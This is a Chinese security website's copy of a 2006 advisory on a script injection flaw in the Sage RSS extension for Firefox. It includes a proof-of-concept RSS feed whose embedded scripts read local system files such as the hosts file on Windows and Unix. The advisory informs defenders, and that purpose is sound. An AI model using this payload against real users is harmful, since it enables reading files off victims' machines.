Firefox Sage扩展RSS Feed脚本注入漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页



	会员登录：

站内搜索：新闻中心系统安全网络安全安全技术下载中心

Firefox Sage扩展RSS Feed脚本注入漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-26 15:02:30

2006-9-12

发布日期：2006-09-08
更新日期：2006-09-12

受影响系统：

Mozine Sage 1.3.6

描述：

BUGTRAQ  ID: 19928

sage是Firefox的一个灵巧的RSS和Atom feed聚合扩展。

sage在处理RSS feed中的内容标签时存在输入验证错误，远程攻击者可能利用此漏洞在用户机器上执行恶意代码。

如果用户受骗添加了恶意的RSS feed并浏览了其内容的话，就会导致在本地环境中注入并执行任意HTML和脚本代码。

<*来源：pdp （pdp.gnucitizen@googlemail.com）

  链接：http://secunia.com/advisories/21839/
        http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?xml version="1.0" encoding="UTF-8" ?>
- <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
- <channel>
  <title>Cross Context Scripting with Sage</title>
- <item>
  <title>WINDOWS: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
  ]]>
  </content:encoded>
  </item>
- <item>
  <title>WINDOWS: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
  ]]>
  </content:encoded>
  </item>
- <item>
  <title>WINNT: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
  ]]>
  </content:encoded>
  </item>
- <item>
  <title>WINNT: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
  ]]>
  </content:encoded>
  </item>
- <item>
  <title>UNIX: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
  ]]>
  </content:encoded>
  </item>
- <item>
  <title>UNIX: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
  ]]>
  </content:encoded>
  </item>
  </channel>
  </rss>

建议：

厂商补丁：

Mozine
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://addons.mozine.org/extensions/moreinfo.php?id=12%22

文章录入：admin 责任编辑：admin

上一篇文章： Microsoft索引服务查询验证跨站脚本执行漏洞（MS06-053）

下一篇文章： GNU Mailman跨站脚本及拒绝服务漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

IronWebMail目录遍历信息
RevilloC MailServer远程
Mozilla Firefox Range脚
Symantec AntiVirus企业
PostgreSQL多字节字符编
UBBThreads多个文件包含
ipconfig工具图形界面脚
System Repair Engineer
SecureRDP为你的3389加道
Regsvr32命令详解

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
站长邮箱：webmaster@anquan365.com 联系电话：86-10-67634029 Copyright © 2006-2008　www.anquan365.com　北京华安普特网络科技有限公司版权所有